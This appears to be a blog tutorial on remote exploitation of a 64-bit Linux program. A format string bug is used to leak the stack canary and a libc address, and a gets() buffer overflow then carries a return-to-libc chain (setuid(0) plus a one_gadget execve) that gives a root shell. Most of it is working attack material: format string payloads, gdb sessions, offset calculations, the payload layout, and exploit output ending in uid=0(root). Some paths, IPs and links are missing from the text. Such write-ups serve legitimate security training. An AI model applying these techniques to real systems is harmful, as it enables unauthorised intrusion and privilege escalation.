Format String Exploits: Defeating Stack Canary, NX and ASLR Remotely on 64 bit

Hey. Welcome back. Last time we learned how to bypass 'nx' bit by making stack executable again with functions like mprotect() and executed our shellcode. This time we will learn about new type of vulnerability than our usual stack overflows. Format string vulnerabilities seem very innocent at first but can provide lot of critical information at attacker's disposal. We will develop a remote exploit and defeat stack canary, nx bit and ASLR.

Let's dive into a simple example. A simple program. It first asks for user's name and then a secret code. It can then verify or do something else with it but for now we will only focus on above part only. You can clearly see a buffer overflow vulnerability gets function for secret code. There could be a read function with improper bound checks too. No buffering for stdin and stdout is set with setvbuf function as we will serve this program over a network. Did you notice 'printf(name);' on line 21 of code ? Seems a lazy programmer's mistake. It directly prints the buffer pointed by name without format strings. It seems so innocent but what will be the behavior if we provide some format strings to name instead ? Let's check out. First compile the code. We are using a 64 bit system and this time we will keep all default protection mechanisms and ASLR on, so no extra flags required. And on target server setuid root permissions to it.
virtual@mecha:~$ gcc format.c -o format
virtual@mecha:~$ sudo chown root format
virtual@mecha:~$ sudo chmod +s format
Now we will serve it on a port with this command.
virtual@mecha:~$ socat tcp-listen:5555,reuseaddr,fork, exec:"./format"
It listens on tcp port 5555 and whenever a connection is made, it executes "./format". You can check by connecting to server with netcat or telnet on port 5555.
virtual@mecha:~$ nc 5555
What is your name?
Name: Attacker
Hello Attacker
Enter secret code !
Code: s3cr3tc0d3
Entered Command centre with code > s3cr3tc0d3 .
Great it's working over network. Let's pass some format strings to name. I have passed '%lx-' 15 times.
virtual@mecha:~$ nc 5555
What is your name?
Name: %lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx
Hello 7ffeae3fd1b0-7f69459f8720-0-7f6945bde4c0-7f6945bde4c0-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-a786c25-7ffeae3ff980-9a7b045172d7ef00
Enter secret code !
Code: s3cr3tc0d3
Entered Command centre with code > s3cr3tc0d3 .
What are those weird hexadecimal characters ?  Also '2d786c25' has repeated 15 times. If you look up ASCII table, it is hex for '%lx-'. It means format string has printed out the contents of stack to us. There are some addresses leaked too. You can verify it by loading the program in gdb and dumping stack. Here '%lx' is used for long hexadecimal as this is 64 bit and '-' is used to separate the output. In this article we will focus on using those leaked addresses to find libc base address and try to leak stack canary. We will then use this leaked memory to do a successful return to libc by overflowing the buffer while entering secret code.  Let's load program in gdb and analyze.
virtual@mecha:~$ gdb format -q
Reading symbols from format...(no debugging symbols found)...done.
gdb-peda$ checksec
FORTIFY   : disabled
NX        : ENABLED
RELRO     : Partial
gdb-peda$ aslr
gdb-peda$ disas center 
Dump of assembler code for function center:
   0x0000000000000815 <+0>: push   rbp
   0x0000000000000816 <+1>: mov    rbp,rsp
   0x0000000000000819 <+4>: sub    rsp,0x90
   0x0000000000000820 <+11>: mov    rax,QWORD PTR fs:0x28
   0x0000000000000829 <+20>: mov    QWORD PTR [rbp-0x8],rax
   0x000000000000082d <+24>: xor    eax,eax
   0x000000000000082f <+26>: lea    rdi,[rip+0x1b2]        # 0x9e8
   0x0000000000000836 <+33>: mov    eax,0x0
   0x000000000000083b <+38>: call   0x6e0 <printf@plt>
   0x0000000000000840 <+43>: lea    rax,[rbp-0x90]
   0x0000000000000847 <+50>: mov    rdi,rax
   0x000000000000084a <+53>: mov    eax,0x0
   0x000000000000084f <+58>: call   0x710 <gets@plt>
   0x0000000000000854 <+63>: lea    rax,[rbp-0x90]
   0x000000000000085b <+70>: mov    rsi,rax
   0x000000000000085e <+73>: lea    rdi,[rip+0x1a3]        # 0xa08
   0x0000000000000865 <+80>: mov    eax,0x0
   0x000000000000086a <+85>: call   0x6e0 <printf@plt>
   0x000000000000086f <+90>: nop
   0x0000000000000870 <+91>: mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000000874 <+95>: xor    rax,QWORD PTR fs:0x28
   0x000000000000087d <+104>: je     0x884 <center+111>
   0x000000000000087f <+106>: call   0x6d0 <__stack_chk_fail@plt>
   0x0000000000000884 <+111>: leave  
   0x0000000000000885 <+112>: ret    
End of assembler dump.
gdb-peda$ b *center +95
Breakpoint 1 at 0x874
As you can see most memory protections like stack canary, nx bit are on. We will keep ASLR disabled in gdb for now so that we can analyze easily. We have verified format string vulnerability in name. Let's check the buffer overflow and stack canary in code. Disassemble the center function. and set breakpoint at *center +95, as it verifies the stack canary here and then decides to call stack_check_fail function.

Stack Canaries

Stack canaries are just random bytes placed after the buffer and checked before function returns. If a buffer overflow occurs then stack canary is overwritten, hence the stack check fails and exception is raised. Stack canaries usually end with null bytes to make exploitation difficult. We don't have to worry about null bytes in gets function. We will try to find stack canary by format string vulnerability here. You can try to bruteforce it on 32 bit systems too. It won't really be feasible to bruteforce on 64 bit. Run the program with format strings and let's fill the code buffer completely with 128 'A's.
gdb-peda$ r
Starting program: /home/archer/compiler_tests/format 
What is your name?
Name: %lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-
Hello 7ffec094b550-7fbb5533a720-0-7fbb555204c0-7fbb555204c0-2d786c252d786c25-2d786c252d786c25-
Enter secret code !
RAX: 0x7068c9a76fdc1c00 
RBX: 0x0 
RCX: 0x0 
RDX: 0x7fbb5533a720 --> 0x0 
RSI: 0x7ffec094b4b0 ("Entered Command center with code > ", 'A' , " .\n94b550-7fbb5533a720-0-7fbb555204c0"...)
RDI: 0x0 
RBP: 0x7ffec094dbe0 --> 0x7ffec094dc40 --> 0x555aec917960 (<__libc_csu_init>: push   r15)
RSP: 0x7ffec094db50 ('A' )
RIP: 0x555aec917874 (<center+95>: xor    rax,QWORD PTR fs:0x28)
R8 : 0x7fbb555204c0 (0x00007fbb555204c0)
R9 : 0x7ffec094af60 --> 0x0 
R10: 0x0 
R11: 0x246 
R12: 0x555aec917730 (<_start>: xor    ebp,ebp)
R13: 0x7ffec094dd20 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
   0x555aec91786a <center+85>: call   0x555aec9176e0 <printf@plt>
   0x555aec91786f <center+90>: nop
   0x555aec917870 <center+91>: mov    rax,QWORD PTR [rbp-0x8]
=> 0x555aec917874 <center+95>: xor    rax,QWORD PTR fs:0x28
   0x555aec91787d <center+104>: je     0x555aec917884 <center+111>
   0x555aec91787f <center+106>: call   0x555aec9176d0 <__stack_chk_fail@plt>
   0x555aec917884 <center+111>: leave  
   0x555aec917885 <center+112>: ret
0000| 0x7ffec094db50 ('A' )
0008| 0x7ffec094db58 ('A' )
0016| 0x7ffec094db60 ('A' )
0024| 0x7ffec094db68 ('A' )
0032| 0x7ffec094db70 ('A' )
0040| 0x7ffec094db78 ('A' )
0048| 0x7ffec094db80 ('A' )
0056| 0x7ffec094db88 ('A' )
Legend: code, data, rodata, value

Breakpoint 1, 0x0000555aec917874 in center ()
Stack canary i.e. '0x7068c9a76fdc1c00' is stored in rax register then checked. And if you notice the memory dumped by our format string the last value is actually our stack canary. Yeah. We leaked stack canary. First problem solved. Now for bypassing NX bit, we will do return to libc. But as ASLR will be on. We need to find libc base address every time. To solve this we will use the addresses leaked by format string. You can leak such addresses to find approx position of your shellcode too.
gdb-peda$ vmmap
Start              End                Perm Name
0x00007fbb54f82000 0x00007fbb55135000 r-xp /usr/lib/
If you look carefully at the dumped addresses, you can notice some are from libc. They must have been loaded on stack when required by some functions. They must be pointing to specific functions in libc, so whenever u run the program they will always be same. Even when ASLR is on, only the addresses will change but they will still point to same function. That means they have same offset from libc base every time. We can take one of these address, calculate it's offset from libc base and use that offset every time to find libc base. Time to set aslr on and find offset to libc base.
gdb-peda$ aslr on
gdb-peda$ aslr
gdb-peda$ r
Starting program: /home/archer/compiler_tests/format 
What is your name?
Name: %lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx 
Hello 7ffe72f66210-7fc16bb5a720-0-7fc16bd404c0-7fc16bd404c0-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-a786c25-7ffe72f689e0-87f4107dcd08200
Enter secret code !
RAX: 0x87f4107dcd08200 
RBX: 0x0 
RCX: 0x0 
RDX: 0x7fc16bb5a720 --> 0x0 
RSI: 0x7ffe72f66170 ("Entered Command center with code > ", 'A' , " .\nf66210-7fc16bb5a720-0-7fc16bd404c0"...)
RDI: 0x0 
RBP: 0x7ffe72f688a0 --> 0x7ffe72f68900 --> 0x5581705e8960 (<__libc_csu_init>: push   r15)
RSP: 0x7ffe72f68810 ('A' )
RIP: 0x5581705e8874 (<center+95>: xor    rax,QWORD PTR fs:0x28)
R8 : 0x7fc16bd404c0 (0x00007fc16bd404c0)
R9 : 0x7ffe72f65c20 --> 0x0 
R10: 0x0 
R11: 0x246 
R12: 0x5581705e8730 (<_start>: xor    ebp,ebp)
R13: 0x7ffe72f689e0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
   0x5581705e886a <center+85>: call   0x5581705e86e0 <printf@plt>
   0x5581705e886f <center+90>: nop
   0x5581705e8870 <center+91>: mov    rax,QWORD PTR [rbp-0x8]
=> 0x5581705e8874 <center+95>: xor    rax,QWORD PTR fs:0x28
   0x5581705e887d <center+104>: je     0x5581705e8884 <center+111>
   0x5581705e887f <center+106>: call   0x5581705e86d0 <__stack_chk_fail@plt>
   0x5581705e8884 <center+111>: leave  
   0x5581705e8885 <center+112>: ret
0000| 0x7ffe72f68810 ('A' )
0008| 0x7ffe72f68818 ('A' )
0016| 0x7ffe72f68820 ('A' )
0024| 0x7ffe72f68828 ('A' )
0032| 0x7ffe72f68830 ('A' )
0040| 0x7ffe72f68838 ('A' )
0048| 0x7ffe72f68840 ('A' )
0056| 0x7ffe72f68848 ('A' )
Legend: code, data, rodata, value

Breakpoint 1, 0x00005581705e8874 in center ()
gdb-peda$ vmmap
Start              End                Perm Name
0x00007fc16b7a2000 0x00007fc16b955000 r-xp /usr/lib/
I am choosing the 4th address which seems to be from libc and calculate it's offset from libc base.
0x7fc16bd404c0-0x00007fc16b7a2000 = 0x59e4c0
Cool. This offset will always be same for the 4th address. Now you can find offset to stack canary and return address either by direct stack dump or a pattern.
0x7ffe72f68870: 0x4141414141414141 0x4141414141414141
0x7ffe72f68880: 0x4141414141414141 0x4141414141414141
0x7ffe72f68890: 0x0000000000000000 0x087f4107dcd08200  <== canary
0x7ffe72f688a0: 0x00007ffe72f68900 0x00005581705e893d  <== return address
virtual@mecha:~$ /opt/metasploit/tools/exploit/pattern_offset.rb -q 0x3765413665413565
[*] Exact match at offset 136
It turned out to be 136 for stack canary and 152 for return address on my system. So the layout is
code = 'A'*136 + canary(8) + 'B'*8 + return_address(8)
Put your glasses on, it's time to make remote exploit.

Since we are serving the program over a network, I will simply use telnetlib in python to connect and interact with it. You can use pwntools library too, but for simplicity I'm just using telnetlib. You can read more on pwntools here. We will see more on pwntools in future. So our strategy will be first to send format strings then read output and extract libc address and stack canary. Then calculate libc base from the address and generate a return to libc payload. We will call setuid(0); first, as we know modern systems drop privileges when not required in setuid binaries. Since this is 64 bit we will pop 0x0 to rdi register and it will be passed to setuid. Also for executing '/bin/sh', I'm simply using one_gadget execve. You can use this tool to find one_gadget or install it simply with $ gem install one_gadget. One thing we are assuming here is that we know the libc version of the target and crafting return to libc according to that. But when you don't know the libc version, you may try to leak some more memory and try to find some offsets according to dumped addresses. Also you may look up online libc databases to better find the target libc version. One thing you can notice is last 3 digits in libc address are always '000' so, the offset's last 3 digits will also be same. This will be even easier in 32 bit as addresses are smaller. We can also leak addresses from Global Offset Table. A cool place to search is and Also I found a repository with big database of libc's here. We will learn more on using such leaks and more ways to leak in next articles.
virtual@mecha:~$ one_gadget /usr/lib/
0x43b88 execve("/bin/sh", rsp+0x30, environ)
  rax == NULL

0x43bdc execve("/bin/sh", rsp+0x30, environ)
  [rsp+0x30] == NULL

0xe49c0 execve("/bin/sh", rsp+0x60, environ)
  [rsp+0x60] == NULL
You can find more ROP gadgets with ROPgadget or Ropper tool. And find offset to setuid.
virtual@mecha:~$ readelf -a /usr/lib/ | grep setuid
    23: 00000000000c67a0   145 FUNC    WEAK   DEFAULT   12 setuid@@GLIBC_2.2.5
  1604: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS setuid.c
  5134: 00000000000c67a0   145 FUNC    LOCAL  DEFAULT   12 __setuid
  5878: 00000000000c67a0   145 FUNC    WEAK   DEFAULT   12 setuid
Compiling everything together, here's my simple exploit code. I have commented each line with explaination. Here's how the stack layout will be after exploit.

Run it.
virtual@mecha:~$ python2                          
Enter this command to setup a server. 5555 is port !
 $ socat tcp-listen:5555,fork, exec:'./format'

[i] Enter target ip (localhost):
[i] Enter target port (5555): 5555
[i] Connecting to server
What is your name?
[' Hello 7ffdec247930', '7fb462c49720', '0', '7fb462e2f4c0', '7fb462e2f4c0', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c25', '7ffdec24a100', '3fe25b5b8083e400', 'Enter secret code !\nCode:']
[+] Found Stack Canary   : 0x3fe25b5b8083e400
[+] Calculated Libc base : 0x7fb462891000
[i] Payload generated
[+] Shell ready. Enter commands !

uid=0(root) gid=1000(virtual) groups=1000(virtual),10(wheel)
Awesome. We wrote a remote expolit and as the service was running as root, we got root privileges.

Well, that's all for now. In next articles we will learn more about GOT and PLT, how powerful format strings exploits can be, and more exploitaitons techniques. Keep practicing.

For any queries contact : @ShivamShrirao

Next Read: Return to PLT, GOT to bypass ASLR remotely


Popular Posts